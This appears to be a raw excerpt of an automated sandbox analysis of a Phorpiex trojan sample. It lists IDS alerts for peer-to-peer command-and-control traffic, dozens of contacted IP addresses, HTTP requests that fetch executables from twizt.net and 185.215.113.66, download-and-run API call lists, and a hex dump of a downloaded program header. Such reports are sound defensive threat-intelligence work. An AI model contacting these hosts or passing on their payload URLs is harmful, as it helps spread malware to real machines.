                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 92.46.174.254:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 31.186.49.163:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 5.251.56.144:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 134.35.173.140:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 5.233.222.244:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 134.35.81.188:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 2.191.221.216:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 189.158.148.85:40500
                                Source: TrafficSnort IDS: 2044077 ET TROJAN Win32/Phorpiex UDP Peer-to-Peer CnC 192.168.2.6:59141 -> 134.35.163.241:40500
                                Source: C:\Users\user\AppData\Local\Temp\135143440.exeCode function: 3_2_0040ACC0 htons,socket,connect,getsockname, www.update.microsoft.com3_2_0040ACC0
                                Source: C:\Users\user\sysvratrel.exeCode function: 5_2_0040ACC0 htons,socket,connect,getsockname, www.update.microsoft.com5_2_0040ACC0
                                Source: C:\Users\user\sysvratrel.exeCode function: 8_2_0040ACC0 htons,socket,connect,getsockname, www.update.microsoft.com8_2_0040ACC0
                                Source: unknownNetwork traffic detected: IP country count 20
                                Source: global trafficTCP traffic: 192.168.2.6:49716 -> 134.35.81.188:40500
                                Source: global trafficTCP traffic: 192.168.2.6:49724 -> 109.72.204.86:40500
                                Source: global trafficTCP traffic: 192.168.2.6:49732 -> 213.230.90.222:40500
                                Source: global trafficTCP traffic: 192.168.2.6:49739 -> 5.232.84.160:40500
                                Source: global trafficTCP traffic: 192.168.2.6:49747 -> 195.181.62.5:40500
                                Source: global trafficTCP traffic: 192.168.2.6:49755 -> 189.190.10.16:40500
                                Source: global trafficTCP traffic: 192.168.2.6:49761 -> 94.141.69.176:40500
                                Source: global trafficTCP traffic: 192.168.2.6:49763 -> 156.212.34.122:40500
                                Source: global trafficTCP traffic: 192.168.2.6:49770 -> 84.53.244.106:40500
                                Source: global trafficTCP traffic: 192.168.2.6:49774 -> 195.158.15.3:40500
                                Source: global trafficTCP traffic: 192.168.2.6:49778 -> 109.122.77.179:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 120.237.99.181:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 85.113.19.18:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 5.200.152.6:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 82.114.186.50:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 95.71.69.217:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 95.107.12.43:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 36.20.68.95:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 2.180.157.70:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 186.94.185.219:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 197.148.34.173:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 5.200.190.214:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 5.63.93.62:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 39.53.75.107:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 89.218.235.182:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 95.58.18.206:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 31.186.54.5:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 217.20.222.188:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 134.35.185.171:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 91.234.219.185:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 41.102.227.47:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 134.35.74.170:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 2.185.146.181:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 82.194.11.2:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 95.156.103.50:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 37.20.161.137:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 151.233.73.168:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 89.219.115.32:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 128.65.176.18:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 212.112.112.84:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 185.177.0.227:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 92.47.124.54:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 181.114.188.143:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 89.236.226.70:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 46.35.86.48:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 2.190.224.61:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 105.109.202.176:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 92.46.174.254:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 31.186.49.163:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 5.251.56.144:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 134.35.173.140:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 5.233.222.244:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 151.233.21.215:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 2.191.221.216:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 189.158.148.85:40500
                                Source: global trafficUDP traffic: 192.168.2.6:59141 -> 134.35.163.241:40500
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:06:57 GMTContent-Type: application/octet-streamContent-Length: 86016Last-Modified: Tue, 23 Apr 2024 21:19:33 GMTConnection: keep-aliveETag: "662825e5-15000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d ab 71 6a 29 ca 1f 39 29 ca 1f 39 29 ca 1f 39 20 b2 95 39 2e ca 1f 39 51 b8 1e 38 2b ca 1f 39 ea c5 42 39 2b ca 1f 39 ea c5 40 39 28 ca 1f 39 ea c5 10 39 2b ca 1f 39 0e 0c 72 39 2d ca 1f 39 29 ca 1e 39 e9 ca 1f 39 0e 0c 64 39 3c ca 1f 39 20 b2 9c 39 2d ca 1f 39 20 b2 9b 39 35 ca 1f 39 20 b2 8e 39 28 ca 1f 39 52 69 63 68 29 ca 1f 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cf 25 28 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e6 00 00 00 78 00 00 00 00 00 00 d0 74 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 01 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 27 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a e5 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 37 00 00 00 00 01 00 00 38 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 3f 00 00 00 40 01 00 00 2e 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                                Source: Joe Sandbox ViewASN Name: TPSUZ-ASUZ TPSUZ-ASUZ
                                Source: Joe Sandbox ViewASN Name: PTC-YEMENNETYE PTC-YEMENNETYE
                                Source: global trafficHTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
                                Source: global trafficHTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: unknownTCP traffic detected without corresponding DNS query: 134.35.81.188
                                Source: unknownTCP traffic detected without corresponding DNS query: 134.35.81.188
                                Source: unknownTCP traffic detected without corresponding DNS query: 134.35.81.188
                                Source: unknownTCP traffic detected without corresponding DNS query: 134.35.81.188
                                Source: unknownTCP traffic detected without corresponding DNS query: 134.35.81.188
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 109.72.204.86
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 109.72.204.86
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 109.72.204.86
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 109.72.204.86
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 109.72.204.86
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 213.230.90.222
                                Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 213.230.90.222
                                Source: unknownTCP traffic detected without corresponding DNS query: 213.230.90.222
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.177
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.177
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.177
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.177
                                Source: unknownTCP traffic detected without corresponding DNS query: 213.230.90.222
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.177
                                Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.177
                                Source: C:\Users\user\Desktop\957C4XK6Lt.exeCode function: 0_2_00531080 GetTickCount,srand,ExpandEnvironmentStringsW,rand,rand,wsprintfW,InternetOpenW,InternetOpenUrlW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,Sleep,wsprintfW,DeleteFileW,Sleep,CloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep,rand,rand,wsprintfW,URLDownloadToFileW,wsprintfW,DeleteFileW,Sleep,0_2_00531080
                                Source: global trafficHTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
                                Source: global trafficHTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: unknownDNS traffic detected: queries for: twizt.net
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 24 Apr 2024 08:07:19 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
